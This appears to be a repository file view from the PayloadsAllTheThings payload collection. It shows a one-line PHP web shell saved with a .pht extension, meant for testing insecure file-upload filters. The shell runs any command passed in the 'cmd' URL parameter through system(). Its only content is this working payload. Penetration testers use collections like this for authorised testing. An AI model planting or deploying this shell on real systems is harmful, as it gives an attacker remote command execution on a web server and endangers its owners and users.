PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.pht

1 line
No EOL
43 B
Text
Executable file

<?php echo "Shell";system($_GET['cmd']); ?>